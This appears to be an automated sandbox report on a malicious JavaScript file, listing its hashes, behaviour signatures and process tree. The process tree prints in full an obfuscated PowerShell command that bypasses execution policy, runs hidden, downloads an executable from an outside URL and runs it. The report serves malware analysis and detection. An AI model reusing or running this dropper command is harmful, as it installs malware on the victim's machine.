Analysis
-
max time kernel
243s -
max time network
245s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
28-06-2021 16:28
Static task
static1
Behavioral task
behavioral1
Sample
CFDI 1675442 76821.js
Resource
win7v20210408
0 signatures
0 seconds
General
-
Target
CFDI 1675442 76821.js
-
Size
34KB
-
MD5
fef5d85788af40d874612dab6910f000
-
SHA1
e0510f670e82ccfd1f6d74e925fbe170c7625846
-
SHA256
4faf4fbb399a98cf3eb551a943f42bec7195287b9cb1deb11e5bd32c25d53264
-
SHA512
d976685412bb31a22498294ad85672dca337a2f579c68771310713a2e3ac3a34a5f62885a48a1499ab743ad653072e737b517a2b6ae17c32b95b994c788762d2
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://saltoune.xyz/pb/aa.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 7 1608 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 1608 powershell.exe 1608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1608 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.execmd.exedescription pid Process procid_target PID 1632 wrote to memory of 1376 1632 wscript.exe 29 PID 1632 wrote to memory of 1376 1632 wscript.exe 29 PID 1632 wrote to memory of 1376 1632 wscript.exe 29 PID 1376 wrote to memory of 1608 1376 cmd.exe 31 PID 1376 wrote to memory of 1608 1376 cmd.exe 31 PID 1376 wrote to memory of 1608 1376 cmd.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js1⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx2⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-